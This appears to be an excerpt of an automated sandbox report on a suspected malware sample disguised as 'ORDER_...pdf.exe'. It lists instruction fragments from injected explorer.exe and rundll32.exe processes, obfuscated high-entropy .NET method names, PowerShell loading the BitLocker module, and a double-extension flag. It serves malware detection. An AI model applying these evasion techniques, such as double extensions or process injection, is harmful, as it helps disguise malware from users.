Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041DDF6 push 8008D580h; iretd	4_2_0041DE00
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_0041D593 push ebx; ret	4_2_0041DC8E
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_00407790 pushad ; iretd	4_2_00407791
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4_2_011409AD push ecx; mov dword ptr [esp], ecx	4_2_011409B6
Source: C:\Windows\explorer.exe	Code function: 6_2_0F007B02 push esp; retn 0000h	6_2_0F007B03
Source: C:\Windows\explorer.exe	Code function: 6_2_0F007B1E push esp; retn 0000h	6_2_0F007B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0F0079B5 push esp; retn 0000h	6_2_0F007AE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9EBB1E push esp; retn 0000h	6_2_0F9EBB1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9EBB02 push esp; retn 0000h	6_2_0F9EBB03
Source: C:\Windows\explorer.exe	Code function: 6_2_0F9EB9B5 push esp; retn 0000h	6_2_0F9EBAE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A06883 push ecx; ret	8_2_00A06896
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00A0682D push ecx; ret	8_2_00A06840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049327FA pushad ; ret	8_2_049327F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0493225F pushad ; ret	8_2_049327F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0493283D push eax; iretd	8_2_04932858
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_049609AD push ecx; mov dword ptr [esp], ecx	8_2_049609B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007A644F pushfd ; iretd	8_2_007A6450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AD4FB push eax; ret	8_2_007AD562
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AD4F2 push eax; ret	8_2_007AD4F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AD4A5 push eax; ret	8_2_007AD4F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AD55C push eax; ret	8_2_007AD562
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007AD593 push ebx; ret	8_2_007ADC8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00797790 pushad ; iretd	8_2_00797791

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: section name: .text entropy: 7.758118048517549

Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, piI8uUijJAV67QhTJy.cs	High entropy of concatenated method names: 'IxneR726yk', 'tJUe22nu4p', 'XvPePnuhgZ', 'yjHecqmcTi', 'r8YewQTIIf', 'iIcesUQT5K', 'NQDQ2oqmLJsyJiTdsk', 'IeAx0QutM7ghxx2nI2', 'IIIeeA8hmN', 'h1Ce0X7sbS'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, ntyPNQqd8Ald6834S8.cs	High entropy of concatenated method names: 'ToString', 'emasMgeoll', 'DqpsVd3l4i', 'jXvsxsRjhH', 'w7IsfxARFu', 'HrKsYbagbM', 'G6lsUPAnN4', 'XBfsHGdQYO', 'uO5soev7Mn', 'st4sXCPBA2'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, SA60ufIefZnjwEFT2L.cs	High entropy of concatenated method names: 'rMr0FjIhjH', 'fIF0aqOkbn', 'FZL0iaQ09b', 'SOq08Ej30y', 'NWY0DIMRoh', 'PMb06v3IP3', 'SMQ0R2OSwb', 'RV402juAxY', 'HHR0Wt0xfe', 'qmW0Pe4Mja'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, XWip28D7gglolbiE2v.cs	High entropy of concatenated method names: 'Dispose', 'PineqBepZG', 'EsHyVZAEcS', 'uLHpphO4kn', 'UbhevNpr7U', 'tkbezIY64x', 'ProcessDialogKey', 'PUQygLD8f1', 'oxMyeot8uZ', 'EdlyyDNjoe'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, mKpsgsS2vj7ffukRBS.cs	High entropy of concatenated method names: 'Y0c9TUHM3', 'P9OBqqTnc', 'FchJC0Hum', 'jk55kVhbd', 'DDFuqf6aP', 'BLJChjbFS', 'M9aXeV4VLI3oacsJo8', 'TtlPGAVnwVIjBACIhB', 'AqtlcGXGq', 'zP8bErRfQ'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, VtMItTd45MA9KvyFQT.cs	High entropy of concatenated method names: 'Ml2ZekJK2M', 'inDZ0mw8c9', 'G5tZEmYKUl', 'g1CZaayNYZ', 'K50Zi7KC9y', 'JscZD8il9I', 'DohZ6WXASx', 'BeslmmKUUg', 'y6GlOuvb27', 'Q21lqDdfmR'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, yiy2XDz6h38oNvimW6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TV3Z76gM84', 'EtAZwtmI9r', 'hpMZsGypTD', 'ldrZjp8EmP', 'VSfZl123nq', 'Jr3ZZgYILd', 'MMHZbPQVxC'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, nVkVrvrLmpG0BesAYv.cs	High entropy of concatenated method names: 'uRnDQP9i1f', 'lU9D5vtZgD', 'g8L8x2HJxd', 'PI58fUqb0t', 'Y328Y4p85u', 'LCJ8UgLnQv', 'V0o8HkLAZI', 'NhJ8oWwfLK', 'KiR8Xfq0r6', 'NeI8ScaKbb'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, EqACNKGBg9AHraHJpeU.cs	High entropy of concatenated method names: 'cckZhp9r4J', 'o76ZKrYu9O', 'L8qZ94fmFs', 'QXGZBF4Bvg', 'cMaZQtous2', 'ThkZJ6nN3k', 'T8HZ5DG2yp', 'he2ZIKIQ4d', 'wgZZuEgdvd', 'MnKZCWk9av'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, MetIWETZ3FJ0RYQ6Sa.cs	High entropy of concatenated method names: 'O6kRhRlTKd', 'isqRKAqFAD', 'rgkR90kCxU', 'XT3RBMKjlV', 'rtoRQOEDru', 'S9wRJQCC2U', 'rUJR51hhFd', 'fyFRIDfMhS', 'ymGRuL4fP8', 'dr2RCN1dkH'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, prL8SWk9Dhladmn3jx.cs	High entropy of concatenated method names: 'mQtRaZAmKD', 'hBaR84xuSD', 'vIwR61mvRi', 'GGd6vmile0', 'qlY6z3V7y1', 'asARggwnNL', 'CuCReDEEMy', 'kYlRyEIHJ6', 'IVTR0jLERc', 'FdrRE39LTW'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, HpKpUH9J6HYDOSdXaW.cs	High entropy of concatenated method names: 'ctO6FodrQa', 'ajb6iemSpA', 'wk36DwelHZ', 'bX16RfiskZ', 'RR8625DVNg', 'BFlDNk7qjN', 'byHDrF61Lr', 'ugHDmFtFuD', 'TLxDOHJGFa', 'qwxDqBIorQ'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, Eysj8lc6j6IKC6fI9m.cs	High entropy of concatenated method names: 'XXKlafTNpZ', 'wnmlixdZIL', 'Qcql8uA06S', 'ObhlDHIQsV', 'Kqtl6lor9E', 'gLDlRmSliM', 'Tall2qJLdf', 'I9jlW6IlJS', 'GpmlPGZnib', 'm75lcAyjm2'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, hr5cNPU7SxIpsd8e8K.cs	High entropy of concatenated method names: 'dXZwSm9iIG', 'aPgwnv0GC5', 'axnwdiYKQq', 'sqUwAXiy5H', 'ATVwVZB2t8', 'O7PwxZCFaO', 'yPZwftjv65', 'jbPwYlNaQB', 'vPgwUWC3uw', 'RoxwHMyrAl'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, hV8VdQHDnIixJ02WRE.cs	High entropy of concatenated method names: 'aEF7IJ0Js4', 'JBx7uMmi5U', 'jYt71h6kw5', 'zva7VJZm4O', 'mgE7fNuqTC', 'HIJ7YdmONU', 'dEk7HldQeT', 'Poq7oLHVuq', 'cur7S6RiAq', 'naJ7Ml2DVr'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, yv2f9FL45JjqXUr6VO.cs	High entropy of concatenated method names: 'k3DjOFaLMo', 'YC1jvxaa5q', 'p5ylgEjmLN', 'ynwle8AhHl', 'i31jMA7grd', 'DmxjnKU06g', 'rsMj3AGCnr', 'htujdsDDWQ', 'dmnjA9Gk7s', 'PD2jLsvhk9'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, KmBHChENhiSgkuxeS2.cs	High entropy of concatenated method names: 'JkDidk68eb', 'adFiA8PN3H', 'kb0iLAUuHn', 'z7FiGejwMb', 'GsqiNJPwS2', 'SDLirj531d', 'EOGimkupZE', 'GuviOlyXGO', 'xxniqRZ1VY', 'LV1ivnDeMq'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, YZbDlb7vK4yKDQgN1q.cs	High entropy of concatenated method names: 's4HjPT3IyW', 'BPsjcaRop4', 'ToString', 'h8xjayUD0t', 'gqYjiDFQmW', 'EQPj8tibWk', 'H2HjD1mndZ', 'Qifj6AHkjP', 'WEyjRpD3FW', 'IJCj23SQAV'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, bebPGV2fABcdBLP15e.cs	High entropy of concatenated method names: 'eeyl14EdYj', 'cy7lVaKqAe', 'xoklxVhVL3', 'YmPlf0eqJi', 'X8JldaiG18', 'q81lYp8YYr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f23b00.1.raw.unpack, zCjBI2ufvlK4pO1FgQ.cs	High entropy of concatenated method names: 'epX8B2CvAV', 'OJ68JmEOnf', 'gqH8IGmC16', 'liX8unIprL', 'e1k8wXTmi2', 'guq8sHRApb', 'fhf8jUVgMj', 'Qip8lrookC', 'm758ZpHAVu', 'zZj8bQobLv'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, piI8uUijJAV67QhTJy.cs	High entropy of concatenated method names: 'IxneR726yk', 'tJUe22nu4p', 'XvPePnuhgZ', 'yjHecqmcTi', 'r8YewQTIIf', 'iIcesUQT5K', 'NQDQ2oqmLJsyJiTdsk', 'IeAx0QutM7ghxx2nI2', 'IIIeeA8hmN', 'h1Ce0X7sbS'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, ntyPNQqd8Ald6834S8.cs	High entropy of concatenated method names: 'ToString', 'emasMgeoll', 'DqpsVd3l4i', 'jXvsxsRjhH', 'w7IsfxARFu', 'HrKsYbagbM', 'G6lsUPAnN4', 'XBfsHGdQYO', 'uO5soev7Mn', 'st4sXCPBA2'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, SA60ufIefZnjwEFT2L.cs	High entropy of concatenated method names: 'rMr0FjIhjH', 'fIF0aqOkbn', 'FZL0iaQ09b', 'SOq08Ej30y', 'NWY0DIMRoh', 'PMb06v3IP3', 'SMQ0R2OSwb', 'RV402juAxY', 'HHR0Wt0xfe', 'qmW0Pe4Mja'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, XWip28D7gglolbiE2v.cs	High entropy of concatenated method names: 'Dispose', 'PineqBepZG', 'EsHyVZAEcS', 'uLHpphO4kn', 'UbhevNpr7U', 'tkbezIY64x', 'ProcessDialogKey', 'PUQygLD8f1', 'oxMyeot8uZ', 'EdlyyDNjoe'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, mKpsgsS2vj7ffukRBS.cs	High entropy of concatenated method names: 'Y0c9TUHM3', 'P9OBqqTnc', 'FchJC0Hum', 'jk55kVhbd', 'DDFuqf6aP', 'BLJChjbFS', 'M9aXeV4VLI3oacsJo8', 'TtlPGAVnwVIjBACIhB', 'AqtlcGXGq', 'zP8bErRfQ'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, VtMItTd45MA9KvyFQT.cs	High entropy of concatenated method names: 'Ml2ZekJK2M', 'inDZ0mw8c9', 'G5tZEmYKUl', 'g1CZaayNYZ', 'K50Zi7KC9y', 'JscZD8il9I', 'DohZ6WXASx', 'BeslmmKUUg', 'y6GlOuvb27', 'Q21lqDdfmR'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, yiy2XDz6h38oNvimW6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TV3Z76gM84', 'EtAZwtmI9r', 'hpMZsGypTD', 'ldrZjp8EmP', 'VSfZl123nq', 'Jr3ZZgYILd', 'MMHZbPQVxC'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, nVkVrvrLmpG0BesAYv.cs	High entropy of concatenated method names: 'uRnDQP9i1f', 'lU9D5vtZgD', 'g8L8x2HJxd', 'PI58fUqb0t', 'Y328Y4p85u', 'LCJ8UgLnQv', 'V0o8HkLAZI', 'NhJ8oWwfLK', 'KiR8Xfq0r6', 'NeI8ScaKbb'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, EqACNKGBg9AHraHJpeU.cs	High entropy of concatenated method names: 'cckZhp9r4J', 'o76ZKrYu9O', 'L8qZ94fmFs', 'QXGZBF4Bvg', 'cMaZQtous2', 'ThkZJ6nN3k', 'T8HZ5DG2yp', 'he2ZIKIQ4d', 'wgZZuEgdvd', 'MnKZCWk9av'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, MetIWETZ3FJ0RYQ6Sa.cs	High entropy of concatenated method names: 'O6kRhRlTKd', 'isqRKAqFAD', 'rgkR90kCxU', 'XT3RBMKjlV', 'rtoRQOEDru', 'S9wRJQCC2U', 'rUJR51hhFd', 'fyFRIDfMhS', 'ymGRuL4fP8', 'dr2RCN1dkH'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, prL8SWk9Dhladmn3jx.cs	High entropy of concatenated method names: 'mQtRaZAmKD', 'hBaR84xuSD', 'vIwR61mvRi', 'GGd6vmile0', 'qlY6z3V7y1', 'asARggwnNL', 'CuCReDEEMy', 'kYlRyEIHJ6', 'IVTR0jLERc', 'FdrRE39LTW'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, HpKpUH9J6HYDOSdXaW.cs	High entropy of concatenated method names: 'ctO6FodrQa', 'ajb6iemSpA', 'wk36DwelHZ', 'bX16RfiskZ', 'RR8625DVNg', 'BFlDNk7qjN', 'byHDrF61Lr', 'ugHDmFtFuD', 'TLxDOHJGFa', 'qwxDqBIorQ'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, Eysj8lc6j6IKC6fI9m.cs	High entropy of concatenated method names: 'XXKlafTNpZ', 'wnmlixdZIL', 'Qcql8uA06S', 'ObhlDHIQsV', 'Kqtl6lor9E', 'gLDlRmSliM', 'Tall2qJLdf', 'I9jlW6IlJS', 'GpmlPGZnib', 'm75lcAyjm2'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, hr5cNPU7SxIpsd8e8K.cs	High entropy of concatenated method names: 'dXZwSm9iIG', 'aPgwnv0GC5', 'axnwdiYKQq', 'sqUwAXiy5H', 'ATVwVZB2t8', 'O7PwxZCFaO', 'yPZwftjv65', 'jbPwYlNaQB', 'vPgwUWC3uw', 'RoxwHMyrAl'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, hV8VdQHDnIixJ02WRE.cs	High entropy of concatenated method names: 'aEF7IJ0Js4', 'JBx7uMmi5U', 'jYt71h6kw5', 'zva7VJZm4O', 'mgE7fNuqTC', 'HIJ7YdmONU', 'dEk7HldQeT', 'Poq7oLHVuq', 'cur7S6RiAq', 'naJ7Ml2DVr'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, yv2f9FL45JjqXUr6VO.cs	High entropy of concatenated method names: 'k3DjOFaLMo', 'YC1jvxaa5q', 'p5ylgEjmLN', 'ynwle8AhHl', 'i31jMA7grd', 'DmxjnKU06g', 'rsMj3AGCnr', 'htujdsDDWQ', 'dmnjA9Gk7s', 'PD2jLsvhk9'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, KmBHChENhiSgkuxeS2.cs	High entropy of concatenated method names: 'JkDidk68eb', 'adFiA8PN3H', 'kb0iLAUuHn', 'z7FiGejwMb', 'GsqiNJPwS2', 'SDLirj531d', 'EOGimkupZE', 'GuviOlyXGO', 'xxniqRZ1VY', 'LV1ivnDeMq'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, YZbDlb7vK4yKDQgN1q.cs	High entropy of concatenated method names: 's4HjPT3IyW', 'BPsjcaRop4', 'ToString', 'h8xjayUD0t', 'gqYjiDFQmW', 'EQPj8tibWk', 'H2HjD1mndZ', 'Qifj6AHkjP', 'WEyjRpD3FW', 'IJCj23SQAV'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, bebPGV2fABcdBLP15e.cs	High entropy of concatenated method names: 'eeyl14EdYj', 'cy7lVaKqAe', 'xoklxVhVL3', 'YmPlf0eqJi', 'X8JldaiG18', 'q81lYp8YYr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.7680000.3.raw.unpack, zCjBI2ufvlK4pO1FgQ.cs	High entropy of concatenated method names: 'epX8B2CvAV', 'OJ68JmEOnf', 'gqH8IGmC16', 'liX8unIprL', 'e1k8wXTmi2', 'guq8sHRApb', 'fhf8jUVgMj', 'Qip8lrookC', 'm758ZpHAVu', 'zZj8bQobLv'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, piI8uUijJAV67QhTJy.cs	High entropy of concatenated method names: 'IxneR726yk', 'tJUe22nu4p', 'XvPePnuhgZ', 'yjHecqmcTi', 'r8YewQTIIf', 'iIcesUQT5K', 'NQDQ2oqmLJsyJiTdsk', 'IeAx0QutM7ghxx2nI2', 'IIIeeA8hmN', 'h1Ce0X7sbS'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, ntyPNQqd8Ald6834S8.cs	High entropy of concatenated method names: 'ToString', 'emasMgeoll', 'DqpsVd3l4i', 'jXvsxsRjhH', 'w7IsfxARFu', 'HrKsYbagbM', 'G6lsUPAnN4', 'XBfsHGdQYO', 'uO5soev7Mn', 'st4sXCPBA2'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, SA60ufIefZnjwEFT2L.cs	High entropy of concatenated method names: 'rMr0FjIhjH', 'fIF0aqOkbn', 'FZL0iaQ09b', 'SOq08Ej30y', 'NWY0DIMRoh', 'PMb06v3IP3', 'SMQ0R2OSwb', 'RV402juAxY', 'HHR0Wt0xfe', 'qmW0Pe4Mja'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, XWip28D7gglolbiE2v.cs	High entropy of concatenated method names: 'Dispose', 'PineqBepZG', 'EsHyVZAEcS', 'uLHpphO4kn', 'UbhevNpr7U', 'tkbezIY64x', 'ProcessDialogKey', 'PUQygLD8f1', 'oxMyeot8uZ', 'EdlyyDNjoe'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, mKpsgsS2vj7ffukRBS.cs	High entropy of concatenated method names: 'Y0c9TUHM3', 'P9OBqqTnc', 'FchJC0Hum', 'jk55kVhbd', 'DDFuqf6aP', 'BLJChjbFS', 'M9aXeV4VLI3oacsJo8', 'TtlPGAVnwVIjBACIhB', 'AqtlcGXGq', 'zP8bErRfQ'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, VtMItTd45MA9KvyFQT.cs	High entropy of concatenated method names: 'Ml2ZekJK2M', 'inDZ0mw8c9', 'G5tZEmYKUl', 'g1CZaayNYZ', 'K50Zi7KC9y', 'JscZD8il9I', 'DohZ6WXASx', 'BeslmmKUUg', 'y6GlOuvb27', 'Q21lqDdfmR'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, yiy2XDz6h38oNvimW6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'TV3Z76gM84', 'EtAZwtmI9r', 'hpMZsGypTD', 'ldrZjp8EmP', 'VSfZl123nq', 'Jr3ZZgYILd', 'MMHZbPQVxC'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, nVkVrvrLmpG0BesAYv.cs	High entropy of concatenated method names: 'uRnDQP9i1f', 'lU9D5vtZgD', 'g8L8x2HJxd', 'PI58fUqb0t', 'Y328Y4p85u', 'LCJ8UgLnQv', 'V0o8HkLAZI', 'NhJ8oWwfLK', 'KiR8Xfq0r6', 'NeI8ScaKbb'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, EqACNKGBg9AHraHJpeU.cs	High entropy of concatenated method names: 'cckZhp9r4J', 'o76ZKrYu9O', 'L8qZ94fmFs', 'QXGZBF4Bvg', 'cMaZQtous2', 'ThkZJ6nN3k', 'T8HZ5DG2yp', 'he2ZIKIQ4d', 'wgZZuEgdvd', 'MnKZCWk9av'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, MetIWETZ3FJ0RYQ6Sa.cs	High entropy of concatenated method names: 'O6kRhRlTKd', 'isqRKAqFAD', 'rgkR90kCxU', 'XT3RBMKjlV', 'rtoRQOEDru', 'S9wRJQCC2U', 'rUJR51hhFd', 'fyFRIDfMhS', 'ymGRuL4fP8', 'dr2RCN1dkH'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, prL8SWk9Dhladmn3jx.cs	High entropy of concatenated method names: 'mQtRaZAmKD', 'hBaR84xuSD', 'vIwR61mvRi', 'GGd6vmile0', 'qlY6z3V7y1', 'asARggwnNL', 'CuCReDEEMy', 'kYlRyEIHJ6', 'IVTR0jLERc', 'FdrRE39LTW'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, HpKpUH9J6HYDOSdXaW.cs	High entropy of concatenated method names: 'ctO6FodrQa', 'ajb6iemSpA', 'wk36DwelHZ', 'bX16RfiskZ', 'RR8625DVNg', 'BFlDNk7qjN', 'byHDrF61Lr', 'ugHDmFtFuD', 'TLxDOHJGFa', 'qwxDqBIorQ'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, Eysj8lc6j6IKC6fI9m.cs	High entropy of concatenated method names: 'XXKlafTNpZ', 'wnmlixdZIL', 'Qcql8uA06S', 'ObhlDHIQsV', 'Kqtl6lor9E', 'gLDlRmSliM', 'Tall2qJLdf', 'I9jlW6IlJS', 'GpmlPGZnib', 'm75lcAyjm2'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, hr5cNPU7SxIpsd8e8K.cs	High entropy of concatenated method names: 'dXZwSm9iIG', 'aPgwnv0GC5', 'axnwdiYKQq', 'sqUwAXiy5H', 'ATVwVZB2t8', 'O7PwxZCFaO', 'yPZwftjv65', 'jbPwYlNaQB', 'vPgwUWC3uw', 'RoxwHMyrAl'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, hV8VdQHDnIixJ02WRE.cs	High entropy of concatenated method names: 'aEF7IJ0Js4', 'JBx7uMmi5U', 'jYt71h6kw5', 'zva7VJZm4O', 'mgE7fNuqTC', 'HIJ7YdmONU', 'dEk7HldQeT', 'Poq7oLHVuq', 'cur7S6RiAq', 'naJ7Ml2DVr'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, yv2f9FL45JjqXUr6VO.cs	High entropy of concatenated method names: 'k3DjOFaLMo', 'YC1jvxaa5q', 'p5ylgEjmLN', 'ynwle8AhHl', 'i31jMA7grd', 'DmxjnKU06g', 'rsMj3AGCnr', 'htujdsDDWQ', 'dmnjA9Gk7s', 'PD2jLsvhk9'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, KmBHChENhiSgkuxeS2.cs	High entropy of concatenated method names: 'JkDidk68eb', 'adFiA8PN3H', 'kb0iLAUuHn', 'z7FiGejwMb', 'GsqiNJPwS2', 'SDLirj531d', 'EOGimkupZE', 'GuviOlyXGO', 'xxniqRZ1VY', 'LV1ivnDeMq'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, YZbDlb7vK4yKDQgN1q.cs	High entropy of concatenated method names: 's4HjPT3IyW', 'BPsjcaRop4', 'ToString', 'h8xjayUD0t', 'gqYjiDFQmW', 'EQPj8tibWk', 'H2HjD1mndZ', 'Qifj6AHkjP', 'WEyjRpD3FW', 'IJCj23SQAV'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, bebPGV2fABcdBLP15e.cs	High entropy of concatenated method names: 'eeyl14EdYj', 'cy7lVaKqAe', 'xoklxVhVL3', 'YmPlf0eqJi', 'X8JldaiG18', 'q81lYp8YYr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ORDER_1105-19-24-3537.pdf.exe.3f93720.0.raw.unpack, zCjBI2ufvlK4pO1FgQ.cs	High entropy of concatenated method names: 'epX8B2CvAV', 'OJ68JmEOnf', 'gqH8IGmC16', 'liX8unIprL', 'e1k8wXTmi2', 'guq8sHRApb', 'fhf8jUVgMj', 'Qip8lrookC', 'm758ZpHAVu', 'zZj8bQobLv'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.exe

Static PE information: ORDER_1105-19-24-3537.pdf.exe

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
